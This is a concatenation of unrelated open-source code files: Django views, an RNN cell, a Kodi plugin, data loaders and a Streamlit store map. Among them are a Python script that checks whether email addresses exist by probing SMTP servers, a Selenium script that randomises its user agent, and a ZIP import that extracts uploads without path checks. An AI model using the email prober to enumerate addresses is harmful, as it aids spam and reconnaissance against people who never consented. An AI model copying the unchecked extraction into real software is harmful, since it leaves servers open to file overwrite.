form.is_valid():\n# cd = form.cleaned_data\n# # 可以定义多个认证后台,Django 内部会逐一调用这些后台的 authenticate 方法来验证用户提供登录凭据的合法性,一旦通过某个后台的验证,表明用户提供的凭据合法,从而允许登录该用户。\n# # 当使用authenticate()函数,Django 会通过每一个定义在AUTHENTICATION_BACKENDS 中的后台一个接一个地���试认证用户,直到其中有一个后台成功的认证,该用户才会停止进行认证。\n# # 只有所有的后台都无法进行用户认证,才不会在你的站点中通过认证。\n# # 使用 authenticate() 方法在数据库对用户进行认证,如果用户认证成功则返回用户对象,否则是 None 。\n# user = authenticate(username=cd['username'], password=cd['password'])\n# if user is not None:\n# # 检查用户是否是激活状态\n# if user.is_active:\n# # login() 方法将用户设置到当前session中然后返回成功消息\n# login(request, user)\n# return redirect(reverse('account:dashboard'))\n# else:\n# form = LoginForm()\n# return render(request, 'account/login.html', {'form': form})\n\n\ndef register(request):\n if request.method == 'POST':\n user_form = UserRegistrationForm(data=request.POST)\n profile_form = ProfileEditForm(data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n new_user = user_form.save(commit=False)\n # User 模型的set_password() 方法将用户的原密码进行加密后再保存\n new_user.set_password(user_form.cleaned_data['password'])\n # modelform才有save方法\n new_user.save()\n new_profile = profile_form.save(commit=False)\n new_profile.user = new_user\n new_profile.save()\n create_action(new_user, '注册成功')\n return render(request, 'account/register_done.html', {'new_user': new_user})\n else:\n user_form = UserRegistrationForm()\n profile_form = ProfileEditForm()\n return render(request, 'account/register.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\n@login_required\ndef edit(request):\n if request.method == 'POST':\n # request.user是UserEditForm这个ModelForm的模型User的实例,ModelForm才有instance=这个参数\n user_form = UserEditForm(instance=request.user, data=request.POST)\n # 
request.user.profile是Profile模型的实例,用户详细信息表单,包括上传的文件,ImageField使用request.FILES获取\n profile_form = ProfileEditForm(instance=request.user.profile, data=request.POST, files=request.FILES)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, '资料更新成功')\n else:\n messages.error(request, '资料更新失败,请检查各字段是否符合要求')\n else:\n user_form = UserEditForm(instance=request.user)\n try:\n # instance=request.user.profile 查询数据库中已存在的用户详细信息,如果查询不到会报错RelatedObjectDoesNotExist\n profile_form = ProfileEditForm(instance=request.user.profile)\n except Exception:\n profile_form = ProfileEditForm()\n return render(request, 'account/edit.html', {'user_form': user_form, 'profile_form': profile_form})\n\n\n# login_required 装饰器(decorator)会检查当前用户是否通过认证,如果用户通过认证,它会执行装饰的视图(view)\n# 如果用户没有通过认证,它会把用户重定向到带有名为 next 的 GET 参数的登录 URL,该 GET 参数保存的变量为用户当前尝试访问的页面 URL\n@login_required\ndef dashboard(request):\n # 当前的用户被设置在request对象中,可以通过使用request.user在模板中访问用户信息,未认证的用户在request中被设置成 AnonymousUser 的实例\n # 除自己以外所有用户的动态\n actions = Action.objects.exclude(user=request.user)\n # 根据request.user获取following,然后返回这些following的id,values_list根据'id'返回元祖,flat=True将元祖展开为列表\n following_ids = request.user.following.values_list('id', flat=True)\n if following_ids:\n # 如果用户正在关注他人,获取用户所关注的人的动态\n # select_related()方法允许取回关联对象,该方法将会转化成单独的、更加复杂的查询集,但是存取这些关联对象时可以避免额外的查询\n # select_related()方法是给ForeignKey(一对多)和OneToOne(一对一)字段使用的,通过在SELECT语句中执行SQL JOIN并且包含关联对象的字段实现\n # 使用user__profile(双下划线)实现在单独的SQL查询中连接profile表,如果调用select_related()而不传入任何参数,会取回所有ForeignKey关系的对象\n # select_related()无法给ManyToMany(多对多)或者倒转ForeignKey(多对一)字段使用,prefetch_realted方法在select_related()方法支持的关系上增加支持多对多和多对一的关系\n # prefetch_related()方法为每种关系执行单独的查询然后对各个结果进行连接,还支��对GeneriRelation和GenericForeignKey的预读\n actions = actions.filter(user_id__in=following_ids).select_related('user', 'user__profile').prefetch_related(\n 'target')\n # 如果用户没有关注任何人,获取最新10条除自己外所有人的动态,不使用order_by(),因为已经在Action模型的Meta中设置过排序规则\n actions = actions[:10]\n return render(request, 'account/dashboard.html', {'section': 'dashboard'})\n\n\n# 查询用户,is_active表示账户是否可用\n@login_required\ndef user_list(request):\n users = User.objects.filter(is_active=True)\n return render(request, 'account/user/list.html', {'section': 'people', 'users': users})\n\n\n# 查询用户详细信息,当通过传入的用户名无法找到用户,视图会返回HTTP 404响应\n@login_required\ndef user_detail(request, username):\n user = get_object_or_404(User, username=username, is_active=True)\n return render(request, 'account/user/detail.html', {'section': 'people', 'user': user})\n\n\n# 因为用户的多对多关系使用定制的中间模型,所以ManyToManyField管理器默认的add()和remove()方法将不可用\n# 使用Contact模型来创建和删除用户关系,本函数仍然使用user_detail视图的模板\n@ajax_required\n@require_POST\n@login_required\ndef user_follow(request):\n user_id = request.POST.get('id')\n action = request.POST.get('action')\n if user_id and action:\n try:\n user = User.objects.get(id=user_id)\n # 如果AJAX发送的是follow\n if action == 'follow':\n # get_or_create方法先查询,如果未查询到则创建\n Contact.objects.get_or_create(user_from=request.user, user_to=user)\n create_action(request.user, '关注了', user)\n # 如果AJAX发送的是unfollow\n else:\n Contact.objects.filter(user_from=request.user, user_to=user).delete()\n return JsonResponse({'status': 'ok'})\n except User.DoesNotExist:\n return JsonResponse({'status': 'ko'})\n return JsonResponse({'status': 
'ko'})\n","repo_name":"Huanghibo/Django_By_Example","sub_path":"bookmarks/account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8414,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"28819134137","text":"\nimport argparse\nimport smtplib\nimport dns.resolver\n\n\n\ndef get_mx(hostname):\n try:\n servidor_mx = dns.resolver.resolve(hostname, 'MX')\n except:\n servidor_mx = None\n \n return servidor_mx\n\ndebug = True\n\ndef Validador(email):\n hostname = email[email.find(\"@\") + 1:]\n s = get_mx(hostname)\n\n if s == None:\n print('No se encuentra MX para el dominio {}'.format(hostname))\n return None\n for mx in s:\n servidor = smtplib.SMTP(timeout=10)\n servidor.connect(str(mx.exchange))\n status, _ = servidor.helo()\n \n if status != 250:\n servidor.quit()\n continue\n servidor.mail('')\n status, _ = servidor.rcpt(email)\n if status == 250:\n servidor.quit()\n return True\n \n servidor.quit()\n \n return False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"\"\"DESCRIPCIÓN: Este script comprueba si una dirección de correo existe en un MX (intercambiador de correo).\"\"\")\n grupo = parser.add_mutually_exclusive_group()\n grupo.add_argument('-e', required=False, default=None, help='Dirección de email a comprobar.')\n grupo.add_argument('-f', required=False, default=None, help='Pasar la Ruta de un archivo en el que se alojan correos.')\n parser.add_argument('-s', required=False, default=None, help='Ruta de un archivo en el que se imprimiran los correos validos.')\n argumentos = parser.parse_args()\n\n \n if (argumentos.e != None ):\n v = Validador(argumentos.e)\n if v:\n print(\"El correo {} es valido\".format(argumentos.e))\n else:\n print(\"El correo {} no es valido\".format(argumentos.e))\n elif(argumentos.f != None):\n f2 = open(argumentos.f, \"r\", encoding='utf-8') #obtencion de los emails del archivo pasado por *args\n lines = f2.readlines()\n if(argumentos.s!= None):\n salida = open(argumentos.s,\"w\",encoding=\"utf-8\")\n \n for email in lines:\n \n v = Validador(email[:len(email)-1])\n if(argumentos.s!= None):\n if v:\n salida.write(email)\n else:\n if v:\n print(email[:len(email)-1])\n \n if(argumentos.s!= None):\n salida.close()\n \n ","repo_name":"eloyrj/ScriptPownd","sub_path":"correos.py","file_name":"correos.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"71449901061","text":"# -*- coding: utf-8 -*\nimport urllib, os, sys\n\nfrom resources.lib import channel\n\n__handle__ = int(sys.argv[1])\n\n#if channel.in_xbmc:\n \n #icon = xbmc.translatePath(os.path.join(__home__, 'resources/rtl-tvi.png'))\n\nchannels = {#'rtltvi': {'name': 'RTL-TVI (Broken)', 'icon': 'rtl-tvi.png', 'module': 'rtl'},\n #'clubrtl': {'name': 'Club RTL (Broken)', 'icon': 'club-rtl.png', 'module': 'rtl'},\n #'plugrtl': {'name': 'Plug RTL (Broken)', 'icon': 'plug-rtl.png', 'module': 'rtl'},\n 'rtbf': {'name': 'RTBF', 'icon': 'rtbf-all.png'},\n 'bx1': {'name': 'BX1', 'icon': 'bx1.jpg'},\n 'tvcom': {'name': 'TV Com', 'icon': 'tvcom.jpg'},\n #'vtm': {'name': 'VTM (Broken)', 'icon': 'vtm.jpg'},\n #'een': {'name': 'EEn (Broken)', 'icon': 'een.png'},\n }\n\ndef show_channels():\n channel.addDir('History', None, action='history')\n channel_ids = list(channels.keys())\n channel_ids.sort()\n for channel_id in channel_ids:\n ch = channels[channel_id]\n if channel.in_xbmc:\n icon = 
xbmc.translatePath(os.path.join(channel.home, 'resources/' + ch['icon']))\n channel.addDir(ch['name'], icon, channel_id=channel_id, action='show_categories')\n else:\n print('%s %s %s ' % (ch['name'], channel_id, 'show_categories'))\n channel.addDir('Settings', None, action='settings')\n \ndef get_params():\n print('Params:')\n print(sys.argv)\n param = {}\n if len(sys.argv) < 3:\n return {}\n paramstring = sys.argv[2]\n if len(paramstring) >= 2:\n params = sys.argv[2]\n cleanedparams = params.replace('?', '')\n if (params[len(params) - 1] == '/'):\n params = params[0:len(params) - 2]\n print(cleanedparams)\n param = dict(urllib.parse.parse_qsl(cleanedparams))\n print(param)\n return param\nprint(\"===============================\\n Video Belgium\\n===============================\")\n\nparams = get_params()\n\naction = params.get('action', False)\nchannel_id = params.get('channel_id')\nprint('channel_id:', channel_id)\n\nif action is False:\n show_channels()\n channel.xbmcplugin.endOfDirectory(__handle__)\nelif action == 'settings':\n import xbmcaddon\n addon = xbmcaddon.Addon()\n addon.openSettings()\nelif action == 'history':\n channel.History().show(channels)\nelif channel_id:\n context = channels[channel_id]\n context.update(params)\n #import sys\n channel_module_name = 'resources.lib.%s' % context.get('module', channel_id)\n __import__(channel_module_name, fromlist=['Channel']).Channel(context)\n #sys.modules[channel_module_name].Channel(context)\n channel.xbmcplugin.endOfDirectory(__handle__)\n","repo_name":"zyphos/belgium-replay-tv","sub_path":"plugin.video.belgium/addon.py","file_name":"addon.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"8"} +{"seq_id":"32910629519","text":"from django.shortcuts import render, reverse, redirect, HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom importdata.models import TeachersFile, ZipProfileFile\nfrom teachers.models import Teacher, Subject, SubjectTaughtBy\nfrom django.db.utils import IntegrityError\nfrom django.contrib import messages\nimport csv\nimport os\nfrom os.path import isfile, join\nfrom os import listdir\nfrom zipfile import ZipFile\n# Create your views here.\n\n\n@method_decorator(login_required, name=\"dispatch\")\nclass ImportData(View):\n\n def get(self, request):\n return render(request, \"import-form.html\")\n\n def post(self, request):\n # for file in request.FILES:\n # print(file)\n csv_file = request.FILES.get('csv-file')\n pics_file = request.FILES.get('pics-file')\n\n if csv_file != None and not csv_file.name.endswith('.csv'):\n messages.error(request, \"Please provide CSV file of records\")\n return redirect(reverse('importdata:import-data'))\n\n if csv_file != None and csv_file.name.endswith('.csv'):\n\n teacherFile = TeachersFile(csvFile=csv_file, user=request.user)\n teacherFile.save()\n with open(teacherFile.csvFile.path, 'r') as teacher_csv:\n reader = csv.DictReader(teacher_csv)\n try:\n for line in reader:\n if not (line['First Name'] == '' and line['Last Name'] == '' and line['Email Address'] == ''):\n\n # print(line)\n try:\n current_teacher, isTCreated = Teacher.objects.get_or_create(\n email=line['Email Address']\n )\n current_teacher.firstname = line['First Name']\n current_teacher.lastname = line['Last Name']\n current_teacher.save()\n except Exception as error:\n print(error.__class__)\n\n for subject in 
line['Subjects taught'].split(', '):\n # print(subject.title())\n try:\n subject, isSubCreated = Subject.objects.get_or_create(\n name=subject.title())\n subject.save()\n\n if len(SubjectTaughtBy.objects.filter(teacher=current_teacher)) < 5:\n stby = SubjectTaughtBy.objects.create(\n teacher=current_teacher,\n subject=subject\n )\n stby.save()\n except IntegrityError:\n continue\n\n if line['Profile picture'] != '':\n current_teacher.image_url = line['Profile picture']\n\n if line['Phone Number'] != '':\n current_teacher.phoneNum = line['Phone Number']\n\n if line['Room Number'] != '':\n current_teacher.roomNum = line['Room Number']\n\n current_teacher.save()\n # print(line)\n except KeyError:\n messages.error(\n request, \"seems like you have choosen wrong csv file\")\n teacherFile.delete()\n return redirect(reverse('importdata:import-data'))\n\n messages.info(request, \"CSV file successfully imported!\")\n teacherFile.delete()\n\n if pics_file != None and not pics_file.name.endswith('.zip'):\n messages.error(request, \"Please provide ZIP file for Pictures\")\n return redirect(reverse('importdata:import-data'))\n\n if pics_file != None and pics_file.name.endswith('.zip'):\n # print(pics_file.name)\n zipProfileFile = ZipProfileFile.objects.create(\n picZipFile=pics_file)\n zipProfileFile.save()\n mediaPath = \"media/\"\n with ZipFile(zipProfileFile.picZipFile.path, 'r') as zipFileObj:\n # print(zipFileObj.printdir())\n zipFileObj.extractall(mediaPath)\n\n all_images = [f for f in listdir(mediaPath) if isfile(\n join(mediaPath, f))]\n for img in all_images:\n # print(img, type(img))\n try:\n teacher = Teacher.objects.get(image_url=img)\n teacher.image = img\n teacher.save()\n except Exception as e:\n # print(\"!!!!!!!!!\", e.__class__)\n continue\n messages.info(request, \"Pics file successfully imported!\")\n zipProfileFile.delete()\n\n return redirect(reverse('importdata:import-data'))\n\n\ndef clearDb(request):\n if request.method == \"POST\":\n Teacher.objects.all().delete()\n Subject.objects.all().delete()\n SubjectTaughtBy.objects.all().delete()\n messages.success(request, \"successfully cleared database\")\n return redirect(reverse('teachers:home'))\n","repo_name":"devksx/testRR","sub_path":"teacherdir/importdata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"17825230566","text":"#!/usr/bin/env/python\n\n\nfrom src.lib.os_handler import OSHandler\nfrom src.models.app import App\nfrom src.models.meta import Meta\nfrom os import listdir\nfrom os.path import isfile, join\nimport logging\nlogger = logging.getLogger('ducked')\n\nclass Indexer:\n\n OS = OSHandler()\n Meta = Meta()\n\n def check_synchronization(self):\n\n if self.needs_synchronization():\n self.index_apps()\n\n def needs_synchronization(self):\n\n initial_sync_completed = self.Meta.get(\"initial_sync_completed\")\n if initial_sync_completed == None or initial_sync_completed[\"value\"] == 0:\n logger.info(\"Initial sync required.\")\n return True\n else:\n return False\n\n def index_apps(self):\n\n logger.info(\"Begin indexing apps.\")\n\n # Mark all for deletion (update everything we can find, then delete the remainder)\n Application = App()\n Application.mark_all_for_deletion()\n\n # Index the installed apps\n self.index_installed_apps()\n\n # Index the indexable plugins\n self.index_plugin_apps()\n\n self.Meta.set(\"initial_sync_completed\", 1)\n logger.info(\"Finish indexing 
apps.\")\n\n # All done, remove the apps we didn't touch\n Application.mark_all_for_deletion()\n\n # Log can't grow too big, watch it for file size\n self.OS.cleanup_logs()\n\n def index_installed_apps(self):\n installed_apps = self.OS.get_installed_apps()\n\n for app in installed_apps:\n Application = App()\n Application.name = app[\"name\"]\n Application.icon = app[\"icon\"]\n Application.command = app[\"command\"]\n Application.source = \"installed\"\n Application.marked_for_deletion = 0\n Application.save()\n\n def index_plugin_apps(self):\n plugin_path = self.OS.cwd() + \"/plugins/indexables/\"\n plugins = [ f for f in listdir(plugin_path) if isfile(join(plugin_path,f)) ]\n\n for plugin in plugins:\n plugin_apps = self.OS.get_apps_from_plugin(plugin)\n\n if plugin_apps != None:\n for app in plugin_apps:\n Application = App()\n Application.name = app[\"name\"]\n Application.icon = app[\"icon\"]\n Application.command = app[\"command\"]\n Application.source = plugin\n Application.marked_for_deletion = 0\n Application.save()","repo_name":"koffiebaard/ducked","sub_path":"src/lib/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"35062753425","text":"import numpy as np\nfrom activation import *\n\n\nclass RNNCell(object):\n \"\"\"RNN Cell class.\"\"\"\n\n def __init__(self, input_size, hidden_size):\n\n self.input_size = input_size\n self.hidden_size = hidden_size\n\n # Activation function for\n self.activation = Tanh()\n\n # hidden dimension and input dimension\n h = self.hidden_size\n d = self.input_size\n\n # Weights and biases\n self.W_ih = np.random.randn(h, d)\n self.W_hh = np.random.randn(h, h)\n self.b_ih = np.random.randn(h)\n self.b_hh = np.random.randn(h)\n\n # Gradients\n self.dW_ih = np.zeros((h, d))\n self.dW_hh = np.zeros((h, h))\n\n self.db_ih = np.zeros(h)\n self.db_hh = np.zeros(h)\n\n def init_weights(self, W_ih, W_hh, b_ih, b_hh):\n self.W_ih = W_ih\n self.W_hh = W_hh\n self.b_ih = b_ih\n self.b_hh = b_hh\n\n def zero_grad(self):\n d = self.input_size\n h = self.hidden_size\n self.dW_ih = np.zeros((h, d))\n self.dW_hh = np.zeros((h, h))\n self.db_ih = np.zeros(h)\n self.db_hh = np.zeros(h)\n\n def __call__(self, x, h):\n return self.forward(x, h)\n\n def forward(self, x, h):\n \"\"\"RNN Cell forward (single time step).\n\n Input (see writeup for explanation)\n -----\n x: (batch_size, input_size)\n input at the current time step\n\n h: (batch_size, hidden_size)\n hidden state at the previous time step and current layer\n\n Returns\n -------\n h_prime: (batch_size, hidden_size)\n hidden state at the current time step and current layer\n\n \"\"\"\n # W_ih shape => hidden_size * input_size, x => batch_size * input_size\n # b_ih shape => hidden_size\n # W_hh shape => hidden_size * hidden_size, h => batch_size * hidden_size\n # b_hh shape => hidden_size\n # h_prime: (batch_size, hidden_size)\n\n affine_term_1 = np.dot(x, self.W_ih.T) + self.b_ih\n affine_term_2 = np.dot(h, self.W_hh.T) + self.b_hh\n h_prime = self.activation(affine_term_1 + affine_term_2)\n return h_prime\n\n\n def backward(self, delta, h, h_prev_l, h_prev_t):\n \"\"\"RNN Cell backward (single time step).\n\n Input (see writeup for explanation)\n -----\n delta: (batch_size, hidden_size)\n Gradient w.r.t the current hidden layer\n\n h: (batch_size, hidden_size)\n Hidden state of the current time step and the current layer\n\n h_prev_l: (batch_size, input_size)\n Hidden state 
at the current time step and previous layer\n (basically analogous to x from forward) \n\n h_prev_t: (batch_size, hidden_size)\n Hidden state at previous time step and current layer\n (basically analogous to h from forward) \n\n Returns\n -------\n dx: (batch_size, input_size)\n Derivative w.r.t. the current time step and previous layer\n\n dh: (batch_size, hidden_size)\n Derivative w.r.t. the previous time step and current layer\n\n \"\"\"\n batch_size = delta.shape[0]\n\n # 0) Done! Step backward through the tanh activation function.\n # Note, because of BPTT, we had to externally save the tanh state, and\n # have modified the tanh activation function to accept an optional input.\n dz = self.activation.derivative(state=h) * delta # => \n\n # backprop formulae\n # h_prime = activation(W_ih * x + W_hh * h)\n # dh_prime / dactivation = dz\n # dh_prime / dW_ih = (dh_prime / dactivation) * (dactivation / dW_ih) = dz * x , where x is h_prev_l\n # dh_prime / dW_hh = (dh_prime / dactivation) * (dactivation / dW_hh) = dz * h , where h is h_prev_t\n # dh_prime / db_ih = (dh_prime / dactivation) * 1 = dz\n # dh_prime / db_hh = (dh_prime / dactivation) * 1 = dz\n # dh_prime / dx = (dh_prime / dactivation) * (dactivation / dx) = dz * W_ih\n # dh_prime / dh = (dh_prime / dactivation) * (dactivation / dh) = dz * W_hh\n\n '''\n backprop shapes based on formulae\n #Note1: We take averages of actual derivatives shown below, as we are accumulating gradients over entire time vector\n dz : (batch_size * hidden_size)\n delta : (batch_size, hidden_size)\n dW_ih = dz * h_prev_l => (hidden_size * input_size) = (batch_size * hidden_size).T * (batch_size, input_size)\n dW_hh = dz * h_prev_t => (hidden_size * hidden_size) = (batch_size * hidden_size).T * (batch_size, hidden_size)\n db_ih = dz => (hidden_size) = (batch_size * hidden_size) , sum over batch_size axis\n \n dx = dz * W_ih => (batch_size, input_size) = (batch_size * hidden_size) * (hidden_size * input_size)\n dh = dz * W_hh => (batch_size, hidden_size) = (batch_size * hidden_size) * (hidden_size * hidden_size)\n '''\n\n # 1) Compute the averaged gradients of the weights and biases\n self.dW_ih += np.dot(dz.T, h_prev_l) / batch_size # division by batch_size: Note1\n self.dW_hh += np.dot(dz.T, h_prev_t) / batch_size \n self.db_ih += np.sum(dz, axis=0) / batch_size \n self.db_hh += np.sum(dz, axis=0) / batch_size \n\n '''\n #Note2: No storing or averaging done for dx, dh because @@@@@?? 
\n        '''\n        # 2) Compute dx, dh\n        dx = np.dot(dz, self.W_ih) #no storing done here\n        dh = np.dot(dz, self.W_hh)\n\n        # 3) Return dx, dh\n        return dx, dh","repo_name":"neelpawarcmu/deep-learning-course-projects","sub_path":"homework-3/hw3p1/mytorch/rnn_cell.py","file_name":"rnn_cell.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"72960713541","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n\ndef preprocess_data(df):\n    \"\"\"return the preprocessed dataframe\"\"\"\n    scaler = MinMaxScaler()\n    df = pd.DataFrame(scaler.fit_transform(df))\n    return df\n\ndef derive_nth_day_feature(df_derive, df, feature, N):\n    rows=df.shape[0]\n    nth_prior_measurements = [None]*N + [df[feature][i-N] for i in range(N,rows)]\n    col_name=\"{}_{}\".format(feature, N)\n    df_derive[col_name]=nth_prior_measurements\n\ndef prepare_data(df):\n    df_derive = df[['YEAR', 'Temperature']]\n    for feature in df.columns:\n        if feature not in ['YEAR','MO','DY']:\n            for N in range(1,4):\n                derive_nth_day_feature(df_derive, df, feature, N)\n    df_derive.dropna(inplace = True)\n    df_derive.reset_index(inplace = True)\n    df_derive.drop(['index'], axis = 1, inplace = True)\n    return df_derive\n\ndef load_data(data_path, preprocess=False):\n    \"\"\"return Pandas dataframes of X, y from the original data\"\"\"\n    df = pd.read_csv(data_path)\n    feature_columns = [\n        \"Relative_Humidity\",\n        \"Specific_Humidity\",\n        \"Precipitation\",\n        \"Pressure\",\n        \"Wind_Speed\",\n        \"Wind_Direction\",\n    ]\n    df.drop(['Specific_Humidity', 'Wind_Direction', 'Pressure'], axis = 1, inplace = True)\n    df_derive = prepare_data(df)\n    train = df_derive[df_derive[\"YEAR\"] < 2021].drop('YEAR', axis = 1)\n    test = df_derive[df_derive[\"YEAR\"] == 2021].drop('YEAR', axis = 1)\n    X_train = train.drop('Temperature', axis = 1).values\n    X_test = test.drop('Temperature', axis = 1).values\n    if preprocess:\n        X_train = preprocess_data(X_train)\n        X_test = preprocess_data(X_test)\n    y_train = train[\"Temperature\"]\n    y_test = test[\"Temperature\"]\n    return X_train, y_train, X_test, y_test\n","repo_name":"hungnt14/Regression_models","sub_path":"utils/dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"17813313958","text":"from selenium import webdriver\nimport time\nimport random\nfrom fake_useragent import UserAgent\n\n# url = \"https://www.instagram.com/\"\n# user_agents_list = [\n# \n# ]\n\n# Change useragent\nuseragent = UserAgent()\n\n\n\n# Options\noptions = webdriver.ChromeOptions()\noptions.add_argument(f\"user-agent={useragent.random}\")\ndriver = webdriver.Chrome(\n    options=options\n)\n# Set proxy (the original call was empty and would raise a TypeError; Chrome expects a value such as \"--proxy-server=host:port\", added before the driver is created)\n# options.add_argument(\"--proxy-server=host:port\")\n\ntry:\n    driver.get(url=\"https://www.whatismybrowser.com/detect/what-is-my-user-agent/\")\n    time.sleep(5)\n\n\nexcept Exception as ex:\n    print(ex)\n\n\nfinally:\n    driver.close()\n    driver.quit()\n","repo_name":"Diesel78q/SeleniumLearn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"35848106924","text":"from nbodykit.binned_statistic import BinnedStatistic\nfrom pyRSD.rsdfit.results import LBFGSResults\nfrom pyRSD.rsdfit import FittingDriver\nfrom pyRSD.rsdfit.parameters import ParameterSet\n\nfrom collections import defaultdict\nfrom glob import 
glob\nimport os\nimport numpy\n\ndef _load(box=None, los=None):\n \"\"\"\n Internal function to load the N-cubic results.\n \"\"\"\n d = os.environ['THESIS_DIR']\n d = os.path.join(d, 'boss_dr12_mocks', 'Results', 'ChallengeMocks', 'nbodykit', 'power')\n\n if los is not None:\n assert los in \"xyz\"\n\n # the pattern\n box = \"*\" if box is None else \"%d\" %box\n los = \"*\" if los is None else los\n\n files = glob(os.path.join(d, f\"pkmu_challenge_boxN{box}_unscaled_dk005_Nmu100_{los}los.dat\"))\n\n toret = []\n for f in files:\n toret.append(BinnedStatistic.from_plaintext(['k', 'mu'], f))\n\n return toret\n\ndef load_spectra(box=None, los=None, subtract_shot_noise=True, average=True):\n \"\"\"\n Load the N-cubic measurement results.\n\n Parameters\n ----------\n box : int, optional\n return the measurement for a specific box\n los : int, optional\n return the measurement for a specific los\n subtract_shot_noise : bool, optional\n whether or not to subtract out the shot noise\n average : bool, optional\n whether to average multiple results\n \"\"\"\n # load the results\n results = _load(box=box, los=None)\n assert len(results) > 0\n\n # return a single result\n if len(results) == 1:\n r = results[0]\n if subtract_shot_noise:\n r['power'].real -= r.attrs['volume'] / r.attrs['N1']\n return r\n\n # return all of the results, maybe averaged\n else:\n if subtract_shot_noise:\n for r in results:\n r['power'].real -= r.attrs['volume'] / r.attrs['N1']\n\n if not average:\n data = [r.data for r in results]\n data = numpy.asarray(data, dtype=data[0].dtype)\n return data\n else:\n data = results[0].copy()\n for k in results[0].variables:\n data[k] = numpy.asarray([r[k] for r in results]).mean(axis=0)\n return data\n\ndef load_fits():\n \"\"\"\n Load a set of fit results.\n\n Returns a structued numpy array holding best-fit values for all free\n parameters all mocks.\n \"\"\"\n # find matches\n pattern = os.path.join(os.environ['RSDFIT_FITS'], 'periodic', 'ChallengeBoxN', 'box*_*los')\n pattern = os.path.join(pattern, 'poles', 'nlopt_gausscov_base_kmax04')\n matches = glob(pattern)\n assert len(matches) > 0\n\n driver = None\n data = defaultdict(list)\n for f in matches:\n r = sorted(glob(os.path.join(f, '*.npz')), key=os.path.getmtime, reverse=True)\n assert len(r) > 0, \"no npz results found in directory '%s'\" %os.path.normpath(f)\n\n th = ParameterSet.from_file(os.path.join(f, 'params.dat'), tags='theory')\n r = LBFGSResults.from_npz(r[0])\n for param in r.free_names:\n data[param].append(r[param])\n th[param].value = r[param]\n\n if driver is None:\n driver = FittingDriver.from_directory(f, init_model=False)\n\n # add fsigma8\n if 'f' in r.free_names and 'sigma8_z' in r.free_names:\n data['fsigma8'].append(r['f'] * r['sigma8_z'])\n\n # the prior to add back\n lnprior = sum(par.lnprior for par in th.free)\n\n # add the reduced chi2\n red_chi2 = (2*(r.min_chi2 + lnprior)) / driver.dof\n data['red_chi2'].append(red_chi2)\n\n params = list(data.keys())\n dtype = list(zip(params, ['f8']*len(params)))\n out = numpy.empty(len(matches), dtype=dtype)\n for param in out.dtype.names:\n out[param] = numpy.array(data[param])\n\n return out\n\ndef load_bestfit_model():\n \"\"\"\n Return a GalaxySpectrum model initialized with the mean of the best-fitting\n theory for all 21 N-series cubic boxes.\n \"\"\"\n # the model file\n model = os.path.join(os.environ['RSDFIT'], 'data', 'models', 'model_nseries.npy')\n\n # the directory of box 1\n d = os.path.join(os.environ['RSDFIT_FITS'], 'periodic', 'ChallengeBoxN', 
'box1_xlos')\n d = os.path.join(d, 'poles', 'nlopt_gausscov_base_kmax04')\n\n # the bestfit values\n fits = load_fits()\n print(\"taking the mean of %d fits...\" %len(fits))\n\n driver = FittingDriver.from_directory(d, model_file=model)\n theta = numpy.array([fits[name].mean() for name in driver.theory.free_names])\n driver.theory.set_free_parameters(theta)\n\n return driver.theory.model\n","repo_name":"nickhand/CutskyCovariance","sub_path":"python/cutskycov/sims/ncubic.py","file_name":"ncubic.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"27478365601","text":"from server import Route, Point\nimport json\n\nwith open(\"../mockdata/ways.json\") as f:\n waydata = json.load(f)\nwith open(\"../mockdata/nodes.json\") as f:\n nodedata = json.load(f)\n\nnodes, ways = Route.transform_json_nodes_and_ways(nodedata, waydata)\n\nstart_id = 8109379\nend_id = 8109400\n\nroute = Route.generate_route(nodes, ways, start_id, end_id)\nprint(route.route, route.distance)\n","repo_name":"sbhs-racepace/racepace-server","sub_path":"tests/route_testing/route_test.py","file_name":"route_test.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"18600935204","text":"\"\"\"\nName: Jacob Gavel\nCS230: SN5\nData: McDonald's\nURL: Link to your web application online (see extra credit)\n\nDescription: In this program the dataset for McDonalds stores is read in and used to create maps for the user.\nThe user is asked a variety of questions to help provide a base for the map and then the map can be interacted with to\nsee the features of the store and contact information about the store.\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pydeck as pdk\nimport streamlit as sl\nimport numpy as np\nimport random\n\nfile = \"mcdonalds_clean1.csv\"\ndat = pd.read_csv(file)\n\nsl.title(\"McDonald's Store Finder\",)\nsl.title(\"Store Locator\")\nrank = []\nfor rows in dat['state']:\n rank.append(0)\n\nstate = []\nfor states in dat[\"state\"]:\n if states not in state:\n state.append(states)\nstate.sort()\nstate_select = 